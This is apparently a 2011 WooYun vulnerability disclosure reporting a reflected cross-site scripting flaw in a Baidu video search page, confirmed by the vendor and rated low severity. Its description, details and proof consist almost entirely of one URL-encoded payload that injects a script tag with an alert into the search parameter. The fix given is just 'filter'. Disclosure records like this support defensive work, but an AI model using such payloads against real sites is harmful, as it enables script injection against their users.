缺陷编号: WooYun-2011-01220
漏洞标题: 百度某频道XSS
相关厂商: 百度
漏洞作者: 路人甲
提交时间: 2011-01-25
公开时间: 2011-02-24
漏洞类型: 跨站脚本攻击
危害等级: 低
漏洞状态: 厂商已经确认
漏洞来源: http://www.wooyun.org
漏洞详情
简要描述:
http://video.baidu.com/v?word=%27%22%3E%22%3E%3Cscript%3Ealert%28%2F222222222%2F%29%3C%2Fscript%3E&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800
详细说明:
http://video.baidu.com/v?word=%27%22%3E%22%3E%3Cscript%3Ealert%28%2F222222222%2F%29%3C%2Fscript%3E&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800
漏洞证明:
http://video.baidu.com/v?word=%27%22%3E%22%3E%3Cscript%3Ealert%28%2F222222222%2F%29%3C%2Fscript%3E&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800
修复方案:
过滤
0 条评论。